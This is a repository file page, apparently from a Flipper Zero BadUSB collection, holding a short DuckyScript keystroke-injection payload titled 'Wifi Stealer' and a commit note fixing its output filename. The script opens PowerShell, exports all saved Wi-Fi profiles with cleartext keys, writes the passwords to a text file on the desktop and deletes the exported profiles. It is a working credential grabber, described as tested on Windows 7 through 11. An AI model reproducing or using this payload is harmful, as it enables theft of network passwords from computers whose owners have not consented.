Flipper/BadUSB/Wifi-Stealer_ORG.txt
amec0e 9e052a9d72
Updated Wifi-Stealer_ORG.txt
When outputting the file it saves as Wifi not Wi-Fi- and does not output to 0.txt, simply removing the dash - between Wifi makes this then work as intended. Tested and working on Windows 11.
2022-08-06 20:32:27 +01:00

14 lines
444 B
Plaintext

REM Title: Wifi Stealer
REM Author: 7h30th3r0n3
REM Target: Tested on Windows 7/8/10/11
REM Version: 1.0
REM Category: Grabber
REM Extracts the SSID and wifi shared key and puts them in a txt file named 0.txt on the desktop
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
STRING cd C:\Users\$env:UserName\Desktop;netsh wlan export profile key=clear;Select-String -Path WiFi-* -Pattern 'keyMaterial'>0.txt;del WiFi-*;exit
ENTER